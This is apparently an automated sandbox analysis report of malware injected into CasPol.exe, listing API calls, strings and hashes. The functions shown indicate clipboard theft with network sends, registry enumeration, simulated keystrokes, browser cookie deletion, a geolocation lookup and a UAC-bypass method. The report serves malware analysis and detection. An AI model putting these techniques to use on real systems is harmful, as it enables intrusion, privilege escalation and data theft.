                                                                              • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                              • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                              • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID: gKE$HE$HE
                                                                              • API String ID: 269201875-2777690135
                                                                              • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                              • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                              • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                              • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                              APIs
                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                              • String ID: T=G$p[G$>G$>G
                                                                              • API String ID: 1596592924-2461731529
                                                                              • Opcode ID: 1b8bf84dea450e44d0bd2fcad236c79bf01660a7f70610c211099af85f61f11c
                                                                              • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                              • Opcode Fuzzy Hash: 1b8bf84dea450e44d0bd2fcad236c79bf01660a7f70610c211099af85f61f11c
                                                                              • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                              • String ID: .part
                                                                              • API String ID: 1303771098-3499674018
                                                                              • Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                              • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                              • Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                              • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                              APIs
                                                                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                              • _wcslen.LIBCMT ref: 0041A8F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                              • API String ID: 37874593-703403762
                                                                              • Opcode ID: e54d693812cff72c31b5d24a3a054f52b8db401424b79dd542274d10b5a38057
                                                                              • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                              • Opcode Fuzzy Hash: e54d693812cff72c31b5d24a3a054f52b8db401424b79dd542274d10b5a38057
                                                                              • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                              • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                              • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                              • __freea.LIBCMT ref: 00449B37
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • __freea.LIBCMT ref: 00449B40
                                                                              • __freea.LIBCMT ref: 00449B65
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                              • String ID:
                                                                              • API String ID: 2597970681-0
                                                                              • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                              • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                              • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                              • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                              APIs
                                                                              • SendInput.USER32 ref: 00418B08
                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InputSend$Virtual
                                                                              • String ID:
                                                                              • API String ID: 1167301434-0
                                                                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                              • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                              • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                              APIs
                                                                              • OpenClipboard.USER32 ref: 00415A46
                                                                              • EmptyClipboard.USER32 ref: 00415A54
                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                              • String ID:
                                                                              • API String ID: 2172192267-0
                                                                              • Opcode ID: be43b12046ea669eaae202fd739bd6432d55700b251bcd6ed2056ddbe96ae737
                                                                              • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                              • Opcode Fuzzy Hash: be43b12046ea669eaae202fd739bd6432d55700b251bcd6ed2056ddbe96ae737
                                                                              • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                              • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                              • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                              • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                              APIs
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • _free.LIBCMT ref: 00444086
                                                                              • _free.LIBCMT ref: 0044409D
                                                                              • _free.LIBCMT ref: 004440BC
                                                                              • _free.LIBCMT ref: 004440D7
                                                                              • _free.LIBCMT ref: 004440EE
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: _free$AllocHeap
                                                                              • String ID: J7D
                                                                              • API String ID: 1835388192-1677391033
                                                                              • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                              • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                              • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                              • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                              APIs
                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A105
                                                                              • __fassign.LIBCMT ref: 0044A180
                                                                              • __fassign.LIBCMT ref: 0044A19B
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1C1
                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1324828854-0
                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                              • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                              • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                              • String ID: TUFTUF$>G$DG$DG
                                                                              • API String ID: 3114080316-344394840
                                                                              • Opcode ID: 7214b498c24b6a36b25b04773345f8211cdfd8029bb5f3628422aaf0decccd1e
                                                                              • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                              • Opcode Fuzzy Hash: 7214b498c24b6a36b25b04773345f8211cdfd8029bb5f3628422aaf0decccd1e
                                                                              • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 1170836740-1018135373
                                                                              • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                              • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                              • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                              • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                              APIs
                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                              • API String ID: 1133728706-4073444585
                                                                              • Opcode ID: 14f0f96447fa4c6e8905fe9d6b08492cf8f09b5957288703f2a69d5f87ec158c
                                                                              • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                              • Opcode Fuzzy Hash: 14f0f96447fa4c6e8905fe9d6b08492cf8f09b5957288703f2a69d5f87ec158c
                                                                              • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
                                                                              • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                              • Opcode Fuzzy Hash: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
                                                                              • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                              • int.LIBCPMT ref: 0040FC0F
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                              • String ID: P[G
                                                                              • API String ID: 2536120697-571123470
                                                                              • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                              • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                              • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                              • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                              APIs
                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                              Strings
                                                                              • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                              • String ID: http://geoplugin.net/json.gp
                                                                              • API String ID: 3121278467-91888290
                                                                              • Opcode ID: cb14169cd2d54e4f0b9a748221c868f26bd958a236bce3cec75326fa3dd5d9bc
                                                                              • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                              • Opcode Fuzzy Hash: cb14169cd2d54e4f0b9a748221c868f26bd958a236bce3cec75326fa3dd5d9bc
                                                                              • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                              APIs
                                                                                • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                              • _free.LIBCMT ref: 0044FD29
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              • _free.LIBCMT ref: 0044FD34
                                                                              • _free.LIBCMT ref: 0044FD3F
                                                                              • _free.LIBCMT ref: 0044FD93
                                                                              • _free.LIBCMT ref: 0044FD9E
                                                                              • _free.LIBCMT ref: 0044FDA9
                                                                              • _free.LIBCMT ref: 0044FDB4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                              • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                              • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                              APIs
                                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                              • CoUninitialize.OLE32 ref: 0040688E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                              • API String ID: 3851391207-2637227304
                                                                              • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                              • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                              • String ID: H]G
                                                                              • API String ID: 2536120697-1717957184
                                                                              • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                              • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                              • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                              • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                              APIs
                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                              Strings
                                                                              • UserProfile, xrefs: 0040B2B4
                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: DeleteErrorFileLast
                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                              • API String ID: 2018770650-304995407
                                                                              • Opcode ID: 9f2292de5349cbb89b874ac3832283976b5779146be5ef793b8f579563e3040a
